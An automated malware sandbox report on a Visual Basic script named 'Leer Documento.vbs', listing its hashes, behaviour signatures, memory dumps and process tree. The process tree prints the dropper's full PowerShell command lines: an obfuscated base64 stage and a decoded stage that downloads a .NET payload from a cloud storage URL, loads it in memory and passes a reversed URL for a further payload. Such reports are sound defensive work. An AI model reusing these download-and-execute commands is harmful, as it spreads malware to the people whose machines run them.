Overview

overview

10

Static

static

1

Leer Documento.vbs

windows7-x64

10

Leer Documento.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    09-08-2024 09:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Leer Documento.vbs

  • Size

    23.1MB

  • MD5

    c7b73269543ae666701b2d97172b93fb

  • SHA1

    e6d9435df4b136ceac144b84ec9b8fa7cfead13a

  • SHA256

    7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c

  • SHA512

    3cbd06d2e480e3b62f0881a51f7f94f797201de3b6053f1f6b7728c9e3467c24c5f58d5a2304d75487703ce496de9a5d4ee795cab6a08eefa45dc68324590287

  • SSDEEP

    1536:VPadPlP4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPm:8v

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Leer Documento.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bq▒HI▒Z▒B1▒HI▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒G8▒dQBl▒Ho▒cw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HU▒ZQBm▒H▒▒ag▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒dQBl▒GY▒c▒Bq▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒bwB1▒GU▒egBz▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒GU▒cgB0▒Gc▒cQBl▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bq▒HI▒Z▒B1▒HI▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Leer Documento.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jrdur = '0';$ouezs = 'C:\Users\Admin\AppData\Local\Temp\Leer Documento.vbs';[Byte[]] $uefpj = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uefpj).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $ouezs , '_____ertgqe__________________-------------', $jrdur, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2520

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    9eee562c1bc51c0d35890fcfd1c96500

    SHA1

    44eb397d4b3bcfffed3b774b61835cf7814ccf22

    SHA256

    3fbd5587c6a0c8b97f895349510d7c94406c2f3bce4533848ec064f5856b5fb2

    SHA512

    b619b0c92a1b702a455460e49e27676abd391049ed9f1e364b4ea5c5a549c1df401a3234e0995fd612d20575b9010dbd05015b42e5b2f8bdb4b206c9d975f64f

    Download Submit

  • memory/2940-4-0x000007FEF5BEE000-0x000007FEF5BEF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2940-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2940-6-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2940-7-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-13-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2940-14-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

    Filesize

    9.6MB

    Download